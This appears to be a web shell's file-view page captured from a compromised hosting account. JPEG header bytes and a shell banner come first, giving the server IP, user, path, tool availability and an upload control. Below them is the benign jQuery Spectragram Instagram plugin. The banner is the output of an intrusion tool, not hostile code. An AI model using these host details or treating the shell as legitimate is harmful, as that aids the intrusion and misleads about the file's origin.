����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.145.28.3 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/greatlifehub.ng/glfiles.name.ng/themes/spirit/assets/frontend/js/ |
Upload File : |
/*! * jQuery - Spectragram by Adrian Quevedo * http://adrianquevedo.com/ - http://lab.adrianquevedo.com/ - http://elnucleo.com.co/ * * Dual licensed under the MIT or GPL Version 2 licenses. * You are free to use this plugin in commercial projects as long as the copyright header is left intact. * * This plugin uses the Instagram(tm) API and is not endorsed or certified by Instagram or Burbn, inc. * All Instagram(tm) logos and trademarks displayed on this plugin are property of Burbn, Inc. * * Date: Thu Jul 15 14:05:02 2012 -0500 */ /*! * * 6 April 2018: Altered by Medium Rare * Bypassed search API endpoint in getUserFeed to use "self" as user ID due to Instagram API changes. * */ // Utility for older browsers if (typeof Object.create !== 'function') { Object.create = function (obj) { function F() {}; F.prototype = obj; return new F(); }; } (function ($, window, document, undefined) { var Instagram = { //Initialize function init: function (options, elem) { var self = this; self.elem = elem; self.$elem = $(elem); self.api = 'https://api.instagram.com/v1', self.accessData = $.fn.spectragram.accessData, self.options = $.extend({}, $.fn.spectragram.options, options); }, //Users //Get the most recent media published by a user. getRecentMedia: function ( userID ) { var self = this, getData = '/users/' + userID + '/media/recent/?' + self.accessData.clientID + '&access_token='+ self.accessData.accessToken +''; self.fetch(getData).done(function ( results ) { self.display(results); }); }, //Search for a user by name. getUserFeed: function () { var self = this; self.getRecentMedia('self'); /* getData = '/users/search?q=' + self.options.query + '&count=' + self.options.max + '&access_token='+ self.accessData.accessToken + ''; self.fetch(getData).done(function ( results ) { if(results.data.length){ self.getRecentMedia(results.data[0].id); }else{ $.error('Spectagram.js - Error: the username ' + self.options.query + ' does not exist.'); }; }); */ }, //Media //Get a list of what media is most popular at the moment getPopular: function () { var self = this, getData = '/media/popular?client_id=' + self.accessData.clientID + '&access_token='+ self.accessData.accessToken + ''; self.fetch(getData).done(function ( results ) { self.display(results); }); }, //Tags //Get a list of recently tagged media getRecentTagged: function () { var self = this, getData = '/tags/' + self.options.query + '/media/recent?client_id=' + self.accessData.clientID + '&access_token='+ self.accessData.accessToken + ''; self.fetch(getData).done(function ( results ) { if(results.data.length){ self.display(results); }else{ $.error('Spectagram.js - Error: the tag ' + self.options.query + ' does not have results.'); }; }); }, fetch: function (getData) { var self = this, getUrl = self.api + getData; return $.ajax({ type: "GET", dataType: "jsonp", cache: false, url: getUrl }); }, display: function (results) { var self = this, setSize = self.options.size, size, max = (self.options.max >= results.data.length) ? results.data.length : self.options.max; if (results.data.length === 0) { self.$elem.append($(self.options.wrapEachWith).append(self.options.notFoundMsg)); } else { for (var i = 0; i < max; i++) { if (setSize == "small") { size = results.data[i].images.thumbnail.url; } else if (setSize == "medium") { size = results.data[i].images.low_resolution.url; } else { size = results.data[i].images.standard_resolution.url; } var titleIMG; // Skip if the caption is empty. if ( results.data[i].caption != null ) { /** * 1. First it creates a dummy element <span/> * 2. And then puts the caption inside the element created previously. * 3. Extracts the html caption (this allows html codes to be included). * 4. Lastly, the most important part, create the Title attribute using double quotes * to enclose the text. This fixes the bug when the caption retrieved from Instagram * includes single quotes which breaks the Title attribute. */ titleIMG = 'title="' + $('<span/>').text(results.data[i].caption.text).html() +'"'; } // Now concatenate the titleIMG generated. self.$elem.append($(self.options.wrapEachWith).append("<a " + titleIMG + " target='_blank' href='" + results.data[i].link + "'><img src='" + size + "'></img></a>")); } } if (typeof self.options.complete === 'function') { self.options.complete.call(self); } } }; jQuery.fn.spectragram = function ( method, options ) { if(jQuery.fn.spectragram.accessData.clientID){ this.each( function () { var instagram = Object.create( Instagram ); instagram.init( options, this ); if( instagram[method] ) { return instagram[method]( this ); }else{ $.error( 'Method ' + method + ' does not exist on jQuery.spectragram' ); } }); }else{ $.error( 'You must define an accessToken and a clientID on jQuery.spectragram' ); } }; //Plugin Default Options jQuery.fn.spectragram.options = { max: 10, query: 'coffee', size: 'medium', wrapEachWith: '<li></li>', complete : null }; //Instagram Access Data jQuery.fn.spectragram.accessData = { accessToken: null, clientID: null }; })(jQuery, window, document);